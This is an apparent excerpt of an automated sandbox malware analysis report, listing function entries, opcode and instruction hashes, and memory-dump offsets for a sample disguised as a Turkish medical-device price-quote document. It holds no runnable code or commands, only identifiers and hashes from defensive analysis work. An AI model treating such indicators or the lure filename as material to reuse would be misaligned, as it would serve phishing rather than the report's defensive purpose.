                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4dc41a14316a6f9e18b327db56677e5ebadf556c26e2081a946b405ce3ebf054
                                                                                                    • Instruction ID: 14578e0eb9ecbf30c6fe43056f5691cff93b56b833aa9df45164176766677e94
                                                                                                    • Opcode Fuzzy Hash: 4dc41a14316a6f9e18b327db56677e5ebadf556c26e2081a946b405ce3ebf054
                                                                                                    • Instruction Fuzzy Hash: E9E02676D24327CAC701E7E0AC000EEF734ADD6221B54855BC02232095EB30260AC7A1
                                                                                                    Function 028428B0 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1246f89213c8f9bb941a588b372c855655683d55ec32fa611cc09910a49966f9
                                                                                                    • Instruction ID: 9b44438f306742223ab7b2fb5e83c9f40eaf4e06d6a9e4a6c89f4adb3948baf4
                                                                                                    • Opcode Fuzzy Hash: 1246f89213c8f9bb941a588b372c855655683d55ec32fa611cc09910a49966f9
                                                                                                    • Instruction Fuzzy Hash: 80D01231D2022B968B00A6A5DC044DEB739EE96261B904626D51537144EB71265986E1
                                                                                                    Function 02846739 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56b04f1527dea536fbb8c86bca4f0a431ee6b032de8bc804ba99f159b0c31666
                                                                                                    • Instruction ID: a72f7196d18ea6fa14ea7226fa5eeca1b57b2cbc30a993d7dd97384478795b0f
                                                                                                    • Opcode Fuzzy Hash: 56b04f1527dea536fbb8c86bca4f0a431ee6b032de8bc804ba99f159b0c31666
                                                                                                    • Instruction Fuzzy Hash: 62E0123000CB59CFD606B7A4F8544193F77FBC73407055699D1019E66ADF795C0AD751
                                                                                                    Function 02848EF7 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                                                    • Instruction ID: e2ee1728656329fbb3b46cb95d326bf01e4350ed1e81608755d63116a60483b7
                                                                                                    • Opcode Fuzzy Hash: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                                                    • Instruction Fuzzy Hash: B3C08C3B20D02C2BA334114E7C80AE3AB4DC3C53B8B210237FA2CD7600AC428C8242E4
                                                                                                    Function 0284AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f4f9e80354cc7e792115538c5ab7088a02b4a3c13343de86ac50d70c868c1db4
                                                                                                    • Instruction ID: d9ba9e0fd2ab56e7270a10605ee52ae98fc94a65246a8605b6b28cafaac67970
                                                                                                    • Opcode Fuzzy Hash: f4f9e80354cc7e792115538c5ab7088a02b4a3c13343de86ac50d70c868c1db4
                                                                                                    • Instruction Fuzzy Hash: BED0673AB001089FCB049F98E8509DDF7B6FB98221B048127E915E3264C671AD25DB50
                                                                                                    Function 02846748 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 790dc504623aea9a4795572cc2b21e7c6b39c794be1c80f785469766729829d2
                                                                                                    • Instruction ID: 7a448d60b7e945944de9322140010357614447a026bbc551cf4664286bf56ef8
                                                                                                    • Opcode Fuzzy Hash: 790dc504623aea9a4795572cc2b21e7c6b39c794be1c80f785469766729829d2
                                                                                                    • Instruction Fuzzy Hash: E2C01230008B098AD505F7A5FC895193B2BE7C02007409558A1055966DEFFC6D495690